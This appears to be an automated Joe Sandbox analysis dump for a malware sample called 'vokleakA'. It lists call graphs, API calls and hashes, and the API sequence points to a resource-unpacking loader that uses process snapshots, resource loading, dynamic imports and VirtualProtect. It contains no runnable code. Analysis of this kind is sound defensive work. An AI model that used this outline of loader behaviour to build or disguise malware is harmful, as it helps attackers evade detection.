18709->18710 18717 40e806 18710->18717 18716 40d2ae _getenv 18716->18708 18718 40d6e0 __lock 62 API calls 18717->18718 18719 40d292 18718->18719 18720 40d196 18719->18720 18721 4104e9 __decode_pointer 6 API calls 18720->18721 18722 40d1aa 18721->18722 18723 4104e9 __decode_pointer 6 API calls 18722->18723 18724 40d1ba 18723->18724 18725 40d23d 18724->18725 18740 40e56a 18724->18740 18737 40d2b7 18725->18737 18727 40d224 18728 41046e __encode_pointer 6 API calls 18727->18728 18729 40d232 18728->18729 18732 41046e __encode_pointer 6 API calls 18729->18732 18730 40d1fc 18730->18725 18734 411d06 __realloc_crt 72 API calls 18730->18734 18735 40d212 18730->18735 18731 40d1d8 18731->18727 18731->18730 18753 411d06 18731->18753 18732->18725 18734->18735 18735->18725 18736 41046e __encode_pointer 6 API calls 18735->18736 18736->18727 18802 40e80f 18737->18802 18741 40e576 _getenv 18740->18741 18742 40e5a3 18741->18742 18743 40e586 18741->18743 18744 40e5e4 HeapSize 18742->18744 18747 40d6e0 __lock 62 API calls 18742->18747 18745 40bfc1 __mbsnbcmp_l 62 API calls 18743->18745 18748 40e59b _getenv 18744->18748 18746 40e58b 18745->18746 18749 40e744 __mbsnbcmp_l 6 API calls 18746->18749 18750 40e5b3 ___sbh_find_block 18747->18750 18748->18731 18749->18748 18758 40e604 18750->18758 18754 411d0f 18753->18754 18756 411d4e 18754->18756 18757 411d2f Sleep 18754->18757 18762 40e34f 18754->18762 18756->18730 18757->18754 18761 40d606 LeaveCriticalSection 18758->18761 18760 40e5df 18760->18744 18760->18748 18761->18760 18763 40e35b _getenv 18762->18763 18764 40e370 18763->18764 18765 40e362 18763->18765 18767 40e383 18764->18767 18768 40e377 18764->18768 18766 40b84d _malloc 62 API calls 18765->18766 18788 40e36a __dosmaperr _getenv 18766->18788 18778 40e4f5 18767->18778 18796 40e390 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 18767->18796 18769 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18768->18769 18769->18788 18770 40e528 18771 40d2e3 _malloc 6 API calls 18770->18771 18774 40e52e 18771->18774 18772 40d6e0 __lock 62 API calls 18772->18796 18773 40e4fa HeapReAlloc 18773->18778 18773->18788 18775 40bfc1 __mbsnbcmp_l 62 API calls 18774->18775 18775->18788 18776 40e54c 18779 40bfc1 __mbsnbcmp_l 62 API calls 18776->18779 18776->18788 18777 40d2e3 _malloc 6 API calls 18777->18778 18778->18770 18778->18773 18778->18776 18778->18777 18780 40e542 18778->18780 18781 40e555 GetLastError 18779->18781 18783 40bfc1 __mbsnbcmp_l 62 API calls 18780->18783 18781->18788 18785 40e4c3 18783->18785 18784 40e41b HeapAlloc 18784->18796 18787 40e4c8 GetLastError 18785->18787 18785->18788 18786 40e470 HeapReAlloc 18786->18796 18787->18788 18788->18754 18789 40def2 ___sbh_alloc_block 5 API calls 18789->18796 18790 40e4db 18790->18788 18792 40bfc1 __mbsnbcmp_l 62 API calls 18790->18792 18791 40d2e3 _malloc 6 API calls 18791->18796 18793 40e4e8 18792->18793 18793->18781 18793->18788 18794 40e4be 18795 40bfc1 __mbsnbcmp_l 62 API calls 18794->18795 18795->18785 18796->18770 18796->18772 18796->18784 18796->18786 18796->18788 18796->18789 18796->18790 18796->18791 18796->18794 18797 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 18796->18797 18798 40e493 18796->18798 18797->18796 18801 40d606 LeaveCriticalSection 18798->18801 18800 40e49a 18800->18796 18801->18800 18805 40d606 LeaveCriticalSection 18802->18805 18804 40d2bc 18804->18716 18805->18804 18808 40b9aa _getenv _strnlen 18806->18808 18807 40b9b8 18809 40bfc1 __mbsnbcmp_l 62 API calls 18807->18809 18808->18807 18811 40b9ec 18808->18811 18810 40b9bd 18809->18810 18812 40e744 __mbsnbcmp_l 6 API calls 18810->18812 18813 40d6e0 __lock 62 API calls 18811->18813 18817 40b9cd _getenv 18812->18817 18814 40b9f3 18813->18814 18863 40b917 18814->18863 18817->17848 18820 4017cc ___crtGetEnvironmentStringsA 18819->18820 18820->17852 18823 40af70 18821->18823 18822 40b84d _malloc 62 API calls 18822->18823 18823->18822 18824 40af8a 18823->18824 18825 40d2e3 _malloc 6 API calls 18823->18825 18829 40af8c std::bad_alloc::bad_alloc 18823->18829 18824->17857 18825->18823 18826 40afb2 19077 40af49 18826->19077 18829->18826 18831 40d2bd __cinit 73 API calls 18829->18831 18831->18826 18832 40afca 18834 401903 lstrlenA 18833->18834 18835 4018fc 18833->18835 19089 4017e0 18834->19089 18835->17880 18838 401940 GetLastError 18840 40194b MultiByteToWideChar 18838->18840 18841 40198d 18838->18841 18839 401996 18839->17880 18842 4017e0 77 API calls 18840->18842 18841->18839 19105 401030 GetLastError 18841->19105 18843 401970 MultiByteToWideChar 18842->18843 18843->18841 18846 40af66 74 API calls 18845->18846 18847 40187c 18846->18847 18848 401885 SysAllocString 18847->18848 18849 4018a4 18847->18849 18848->18849 18849->17882 18851 40231a SafeArrayUnaccessData 18850->18851 18851->17889 18853 4019aa InterlockedDecrement 18852->18853 18858 4019df VariantClear 18852->18858 18854 4019b8 18853->18854 18853->18858 18855 4019c2 SysFreeString 18854->18855 18856 4019c9 18854->18856 18854->18858 18855->18856 19114 40aec0 18856->19114 18858->17896 18860 401571 18859->18860 18862 401582 18859->18862 19120 40afe0 18860->19120 18862->17863 18862->18862 18864 40b92c 18863->18864 18865 40b930 18863->18865 18869 40ba18 18864->18869 18865->18864 18867 40b942 _strlen 18865->18867 18872 40eeab 18865->18872 18867->18864 18882 40edfb 18867->18882 19076 40d606 LeaveCriticalSection 18869->19076 18871 40ba1f 18871->18817 18873 40eec6 18872->18873 18874 40ef2b 18872->18874 18873->18874 18875 40eecc WideCharToMultiByte 18873->18875 18876 411cba __calloc_crt 62 API calls 18873->18876 18877 40eeef WideCharToMultiByte 18873->18877 18881 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18873->18881 18885 414d44 18873->18885 18874->18867 18875->18873 18875->18874 18876->18873 18877->18873 18878 40ef37 18877->18878 18880 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18878->18880 18880->18874 18881->18873 18977 40ed0d 18882->18977 18886 414d76 18885->18886 18887 414d59 18885->18887 18888 414dd4 18886->18888 18931 417e7e 18886->18931 18889 40bfc1 __mbsnbcmp_l 62 API calls 18887->18889 18890 40bfc1 __mbsnbcmp_l 62 API calls 18888->18890 18892 414d5e 18889->18892 18919 414d6e 18890->18919 18893 40e744 __mbsnbcmp_l 6 API calls 18892->18893 18893->18919 18895 414db5 18897 414e12 18895->18897 18898 414de7 18895->18898 18900 414dcb 18895->18900 18897->18919 18942 414c98 18897->18942 18902 411c75 __malloc_crt 62 API calls 18898->18902 18898->18919 18903 40eeab ___wtomb_environ 119 API calls 18900->18903 18906 414df7 18902->18906 18904 414dd0 18903->18904 18904->18888 18904->18897 18905 414e8f 18907 414f7a 18905->18907 18912 414e98 18905->18912 18906->18897 18911 411c75 __malloc_crt 62 API calls 18906->18911 18906->18919 18909 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18907->18909 18908 414e41 18910 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18908->18910 18909->18919 18915 414e4b 18910->18915 18911->18897 18913 411d54 __recalloc_crt 73 API calls 18912->18913 18912->18919 18916 414e51 _strlen 18913->18916 18914 414f5e 18918 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18914->18918 18914->18919 18915->18916 18946 411d54 18915->18946 18916->18914 18916->18919 18920 411cba __calloc_crt 62 API calls 18916->18920 18918->18919 18919->18873 18921 414efb _strlen 18920->18921 18921->18914 18922 40ef42 _strcpy_s 62 API calls 18921->18922 18923 414f14 18922->18923 18924 414f28 SetEnvironmentVariableA 18923->18924 18925 40e61c __invoke_watson 10 API calls 18923->18925 18926 414f49 18924->18926 18927 414f52 18924->18927 18928 414f25 18925->18928 18929 40bfc1 __mbsnbcmp_l 62 API calls 18926->18929 18930 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18927->18930 18928->18924 18929->18927 18930->18914 18951 417dc2 18931->18951 18933 414d89 18933->18888 18933->18895 18934 414cea 18933->18934 18935 414cfb 18934->18935 18939 414d3b 18934->18939 18936 411cba __calloc_crt 62 API calls 18935->18936 18938 414d12 18936->18938 18937 414d24 18937->18939 18958 417d6d 18937->18958 18938->18937 18940 40e79a __amsg_exit 62 API calls 18938->18940 18939->18895 18940->18937 18945 414ca6 18942->18945 18943 414ccd 18943->18905 18943->18908 18944 40edfb __fassign 106 API calls 18944->18945 18945->18943 18945->18944 18950 411d5d 18946->18950 18948 411da0 18948->18916 18949 411d81 Sleep 18949->18950 18950->18948 18950->18949 18966 40b783 18950->18966 18952 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 18951->18952 18953 417dd6 18952->18953 18954 40bfc1 __mbsnbcmp_l 62 API calls 18953->18954 18957 417df4 __mbschr_l 18953->18957 18955 417de4 18954->18955 18956 40e744 __mbsnbcmp_l 6 API calls 18955->18956 18956->18957 18957->18933 18959 417d7e _strlen 18958->18959 18965 417d7a 18958->18965 18960 40b84d _malloc 62 API calls 18959->18960 18961 417d91 18960->18961 18962 40ef42 _strcpy_s 62 API calls 18961->18962 18961->18965 18963 417da3 18962->18963 18964 40e61c __invoke_watson 10 API calls 18963->18964 18963->18965 18964->18965 18965->18937 18967 40b792 18966->18967 18968 40b7ba 18966->18968 18967->18968 18970 40b79e 18967->18970 18969 40b7cf 18968->18969 18971 40e56a __msize 63 API calls 18968->18971 18972 40e34f _realloc 71 API calls 18969->18972 18973 40bfc1 __mbsnbcmp_l 62 API calls 18970->18973 18971->18969 18976 40b7b3 _memset 18972->18976 18974 40b7a3 18973->18974 18975 40e744 __mbsnbcmp_l 6 API calls 18974->18975 18975->18976 18976->18950 18978 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 18977->18978 18979 40ed21 18978->18979 18980 40ed2a 18979->18980 18981 40ed42 18979->18981 18983 40ed75 18979->18983 18980->18867 18982 40bfc1 __mbsnbcmp_l 62 API calls 18981->18982 18984 40ed47 18982->18984 18985 40ed99 18983->18985 18986 40ed7f 18983->18986 18989 40e744 __mbsnbcmp_l 6 API calls 18984->18989 18987 40eda1 18985->18987 18988 40edb5 18985->18988 18990 40bfc1 __mbsnbcmp_l 62 API calls 18986->18990 18995 414b9e 18987->18995 19015 414b5c 18988->19015 18989->18980 18993 40ed84 18990->18993 18994 40e744 __mbsnbcmp_l 6 API calls 18993->18994 18994->18980 18996 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 18995->18996 18997 414bb2 18996->18997 18998 414bd3 18997->18998 19000 414c06 18997->19000 19013 414bbb 18997->19013 18999 40bfc1 __mbsnbcmp_l 62 API calls 18998->18999 19001 414bd8 18999->19001 19002 414c10 19000->19002 19003 414c2a 19000->19003 19006 40e744 __mbsnbcmp_l 6 API calls 19001->19006 19007 40bfc1 __mbsnbcmp_l 62 API calls 19002->19007 19004 414c34 19003->19004 19005 414c49 19003->19005 19020 417c1d 19004->19020 19009 414b5c ___crtCompareStringA 95 API calls 19005->19009 19006->19013 19010 414c15 19007->19010 19012 414c63 19009->19012 19011 40e744 __mbsnbcmp_l 6 API calls 19010->19011 19011->19013 19012->19013 19014 40bfc1 __mbsnbcmp_l 62 API calls 19012->19014 19013->18980 19014->19013 19016 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 19015->19016 19017 414b6f 19016->19017 19036 4147ec 19017->19036 19021 417c33 19020->19021 19032 417c58 ___ascii_strnicmp 19020->19032 19022 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 19021->19022 19023 417c3e 19022->19023 19024 417c43 19023->19024 19026 417c78 19023->19026 19025 40bfc1 __mbsnbcmp_l 62 API calls 19024->19025 19027 417c48 19025->19027 19028 417c82 19026->19028 19035 417caa 19026->19035 19030 40e744 __mbsnbcmp_l 6 API calls 19027->19030 19029 40bfc1 __mbsnbcmp_l 62 API calls 19028->19029 19031 417c87 19029->19031 19030->19032 19034 40e744 __mbsnbcmp_l 6 API calls 19031->19034 19032->19013 19033 4168fc 97 API calls __tolower_l 19033->19035 19034->19032 19035->19032 19035->19033 19037 414818 CompareStringW 19036->19037 19042 41482f strncnt 19036->19042 19038 41483b GetLastError 19037->19038 19037->19042 19038->19042 19039 40ce09 __atodbl_l 5 API calls 19040 414b5a 19039->19040 19040->18980 19041 414a95 19043 417a20 ___ansicp 86 API calls 19041->19043 19042->19041 19044 4148a4 19042->19044 19057 414881 19042->19057 19045 414abb 19043->19045 19046 414962 MultiByteToWideChar 19044->19046 19049 4148e6 GetCPInfo 19044->19049 19044->19057 19047 414b1c CompareStringA 19045->19047 19050 417a69 ___convertcp 69 API calls 19045->19050 19045->19057 19054 414982 19046->19054 19046->19057 19048 414b3a 19047->19048 19047->19057 19051 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 19048->19051 19052 4148f7 19049->19052 19049->19057 19053 414ae0 19050->19053 19056 414b40 19051->19056 19052->19046 19052->19057 19053->19057 19059 417a69 ___convertcp 69 API calls 19053->19059 19055 41499f __crtGetStringTypeA_stat 19054->19055 19060 40b84d _malloc 62 API calls 19054->19060 19055->19057 19058 4149d9 MultiByteToWideChar 19055->19058 19061 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 19056->19061 19057->19039 19062 4149f2 MultiByteToWideChar 19058->19062 19075 414a83 19058->19075 19063 414b01 19059->19063 19060->19055 19061->19057 19068 414a09 19062->19068 19062->19075 19065 414b16 19063->19065 19066 414b0a 19063->19066 19064 4147ae __freea 62 API calls 19064->19057 19065->19047 19067 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 19066->19067 19067->19057 19070 414a1f __crtGetStringTypeA_stat 19068->19070 19071 40b84d _malloc 62 API calls 19068->19071 19069 414a53 MultiByteToWideChar 19072 414a66 CompareStringW 19069->19072 19073 414a7d 19069->19073 19070->19069 19070->19075 19071->19070 19072->19073 19074 4147ae __freea 62 API calls 19073->19074 19074->19075 19075->19064 19076->18871 19083 40d0f5 19077->19083 19080 40cd39 19081 40cd62 19080->19081 19082 40cd6e RaiseException 19080->19082 19081->19082 19082->18832 19084 40d115 _strlen 19083->19084 19088 40af59 19083->19088 19085 40b84d _malloc 62 API calls 19084->19085 19084->19088 19086 40d128 19085->19086 19087 40ef42 _strcpy_s 62 API calls 19086->19087 19086->19088 19087->19088 19088->19080 19090 4017f3 19089->19090 19091 4017e9 EntryPoint 19089->19091 19092 401805 19090->19092 19093 4017fb EntryPoint 19090->19093 19091->19090 19094 401818 19092->19094 19095 40180e EntryPoint 19092->19095 19093->19092 19096 40183e 19094->19096 19098 40b783 __recalloc 72 API calls 19094->19098 19100 401844 19094->19100 19095->19094 19099 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 19096->19099 19101 40182d 19098->19101 19099->19100 19102 40186d MultiByteToWideChar 19100->19102 19103 40184e EntryPoint 19100->19103 19107 40b743 19100->19107 19101->19100 19104 401834 EntryPoint 19101->19104 19102->18838 19102->18839 19103->19100 19104->19096 19106 401044 EntryPoint 19105->19106 19108 40e231 __calloc_impl 62 API calls 19107->19108 19109 40b75d 19108->19109 19110 40bfc1 __mbsnbcmp_l 62 API calls 19109->19110 19113 40b779 19109->19113 19111 40b770 19110->19111 19112 40bfc1 __mbsnbcmp_l 62 API calls 19111->19112 19111->19113 19112->19113 19113->19100 19115 40b6b5 _getenv 19114->19115 19116 40b73d _getenv 19115->19116 19117 40b714 HeapFree 19115->19117 19116->18858 19117->19116 19118 40b727 19117->19118 19119 40bfc1 __mbsnbcmp_l 62 API calls 19118->19119 19119->19116 19121 40aff8 19120->19121 19122 40b027 19121->19122 19123 40b01f __VEC_memcpy 19121->19123 19122->18862 19123->19122 19126 41265c 19124->19126 19128 4126c9 19126->19128 19130 416836 19126->19130 19127 4127c7 19127->17920 19127->17922 19128->19127 19129 416836 72 API calls _parse_cmdline 19128->19129 19129->19128 19133 4167e3 19130->19133 19134 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 19133->19134 19135 4167f6 19134->19135 19135->19126 19137 40e8ea _getenv 19136->19137 19138 40d6e0 __lock 62 API calls 19137->19138 19139 40e8f1 19138->19139 19141 4104e9 __decode_pointer 6 API calls 19139->19141 19145 40e9aa __initterm 19139->19145 19143 40e928 19141->19143 19143->19145 19147 4104e9 __decode_pointer 6 API calls 19143->19147 19144 40e9f2 _getenv 19144->17927 19153 40e9f5 19145->19153 19151 40e93d 19147->19151 19148 40e9e9 19149 40e7ee _malloc 3 API calls 19148->19149 19149->19144 19150 4104e0 6 API calls ___crtMessageBoxW 19150->19151 19151->19145 19151->19150 19152 4104e9 6 API calls __decode_pointer 19151->19152 19152->19151 19154 40e9d6 19153->19154 19155 40e9fb 19153->19155 19154->19144 19157 40d606 LeaveCriticalSection 19154->19157 19158 40d606 LeaveCriticalSection 19155->19158 19157->19148 19158->19154

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 87 4021aa-4021c0 49->87 50->49 52 401d10-401d2e call 401650 51->52 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 86 401dad-401dbd Module32Next 81->86 83->79 85 401d92-401d9a 83->85 84->81 85->77 85->84 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 31abd01d 122->154 155 40234e call 31abd01c 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 31abd01d 135->152 153 402390 call 31abd01c 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 141 4023b6-4023b8 140->141 142 4023ba 140->142 144 4023bc-402417 VariantClear * 2 call 4019a0 141->144 142->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                    • _getenv.LIBCMT ref: 00401ABA
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                    • Module32First.KERNEL32 ref: 00401C48
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                    • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                    • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                    • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                    • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                    • _malloc.LIBCMT ref: 00401EBA
                                                                                                    • _memset.LIBCMT ref: 00401EDD
                                                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                    • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                    • API String ID: 2366190142-2962942730
                                                                                                    • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                    • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                    • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                    • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 86e17d3ca143b8bc1713396d4ed098457a4e74e4b9780b8da3110c592ebab4e7
                                                                                                    • Instruction ID: bc1f2eb340d5f05bdd17580018123580ed3c0dbab4ffcd50afce227bffac7a3e
                                                                                                    • Opcode Fuzzy Hash: 86e17d3ca143b8bc1713396d4ed098457a4e74e4b9780b8da3110c592ebab4e7
                                                                                                    • Instruction Fuzzy Hash: 27224F34B002158FEB089F69C894B3EB6E7BFC8711F158869E50A9B3A5CFB4DC468741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                    • GetLastError.KERNEL32 ref: 00401940
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3322701435-0
                                                                                                    • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                    • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                    • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                    • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 0040AF80
                                                                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                      • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                    • String ID:
                                                                                                    • API String ID: 1411284514-0
                                                                                                    • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                    • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                    • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                    • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 264 31b191e0-31b19261 VirtualProtect 267 31b19263-31b19269 264->267 268 31b1926a-31b1928f 264->268 267->268
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 31B19254
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3231199992.0000000031B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_31b10000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: 3376955826f2e022a242f41ddea83da3fe0c7ab92e298806b0001c099ce3534b
                                                                                                    • Instruction ID: f8802d90e0593ae8ae4fc0130b5cf9f4e1a9acb1e99852e350a882d2b5e58762
                                                                                                    • Opcode Fuzzy Hash: 3376955826f2e022a242f41ddea83da3fe0c7ab92e298806b0001c099ce3534b
                                                                                                    • Instruction Fuzzy Hash: 771117B1D002499FDB10DFAAC540AEEFBF8FF48320F10842AD419A7250C779A940CFA1
                                                                                                    Uniqueness

